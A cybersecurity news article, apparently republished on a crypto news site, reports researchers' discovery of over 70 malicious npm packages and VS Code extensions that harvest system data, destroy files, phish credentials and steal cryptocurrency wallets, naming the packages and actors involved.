Crypto News

Caution: 70+ Malicious npm & VS Code Packages Discovered Stealing Data and Crypto!

May 27, 2025
Smart Money

Over 70 Malicious npm and VS Code Packages Discovered Stealing Data and Cryptocurrency

By: Ravie Lakshmanan
Published: May 26, 2025
Categories: Cybersecurity, Cryptocurrency

In a recent cybersecurity alert, researchers have unveiled a growing threat within the software development community, identifying over 70 malicious packages on the npm (Node Package Manager) registry and Microsoft’s Visual Studio Code (VS Code) Marketplace that have been designed to steal sensitive data and cryptocurrency credentials.

npm Package Threat: Data Harvesting

According to a report by security researcher Kirill Boychenko from the software supply chain security firm Socket, approximately 60 malicious npm packages were discovered that possess the functionality to collect data from user systems. The packages, which were uploaded by three accounts that have since been deactivated, implemented install-time scripts that were triggered upon execution. Each malicious package, collectively downloaded over 3,000 times, was engineered to capture essential details such as hostnames, IP addresses, DNS servers, and user directories.

“The script targets Windows, macOS, or Linux systems and employs sandbox evasion techniques, positioning every infected workstation or continuous integration node as a potential source of valuable reconnaissance,” Boychenko articulated in his findings.

The accounts behind these malicious packages were listed as:

  • bbbb335656
  • cdsfdfafd1232436437
  • sdsds656565

The malicious code contained within these packages deliberately fingerprints any machine that installs them, terminating functionality if it detects a virtualized environment linked to major cloud services such as Amazon and Google. The harvested data is sent to a Discord webhook, allowing attackers to map out the network and identify potential high-value targets for future campaigns.

Destructive npm Packages

In addition to the data-stealing packages, Socket’s report also highlights the discovery of eight additional malicious npm packages masquerading as helper libraries for widely-used JavaScript frameworks, such as React and Vue.js. These packages, labeled as:

  • vite-plugin-vue-extend
  • quill-image-downloader
  • js-hood
  • js-bomb
  • vue-plugin-bomb
  • vite-plugin-bomb
  • vite-plugin-bomb-extend
  • vite-plugin-react-extend

Once installed, they deploy destructive payloads, which corrupted data and erased critical files. Having amassed more than 6,200 downloads, some of these packages were programmed to execute automatically, leading to recursive file deletions related to prominent frameworks and corrupting fundamental JavaScript methods.

Notably, the package js-bomb was highlighted for not only deleting files but also executing system shutdowns at specified times. The threat actor behind this activity, known as xuxingfeng, has previously published five legitimate packages, illustrating a tactic of releasing both beneficial and harmful packages to enhance credibility and trust among developers.

Phishing Campaigns via Malicious Packages

Further complicating the situation, a novel phishing campaign was reported, linking traditional email phishing with JavaScript code embedded in a malicious npm package posing as an innocuous open-source library. This malicious maneuver, uncovered by Fortra researcher Israel Cerda, involved phishing emails that contained malicious .HTM files directing users to a counterfeit Office 365 login page designed for credential theft. The campaign’s sophistication included the use of AES encryption and npm packages delivered through a content delivery network, further obscuring the attackers’ malicious tactics.

VS Code Extensions Targeting Cryptocurrency

The threat extends beyond npm packages; Datadog Security Research identified several harmful extensions in the Visual Studio Code Marketplace engineered to steal cryptocurrency wallet credentials from users, particularly targeting Solidity developers. Known under the names:

  • solaibot
  • among-eth
  • blankebesxstnion

These extensions masked malicious code within legitimate features, employing complex multilayered infection chains, which included obfuscated malware resistant to detection. They were purportedly designed for syntax scanning and vulnerability detection, but alongside these features, they sought to inject malware capable of pilfering Ethereum wallet information and executing commands that disable critical security measures such as Windows Defender.

With these extensions now removed from the marketplace, experts remain vigilant, suggesting that the threat actor, identified as MUT-9332, may continue to evolve tactics in future campaigns.

Conclusion

The findings underscore the ongoing threat posed by malicious packages and extensions within widely-used development environments. They highlight the necessity for developers to exercise heightened caution when sourcing libraries and extensions from public repositories and emphasize the importance of strong cybersecurity practices in the contemporary software supply chain landscape.

As attackers become increasingly sophisticated, adhering to robust security protocols and remaining aware of emerging threats is essential for safeguarding digital assets against exploitation.

For ongoing updates and in-depth analyses on cybersecurity and cryptocurrency threats, follow us on Twitter and LinkedIn.

Leave a Reply

Your email address will not be published. Required fields are marked *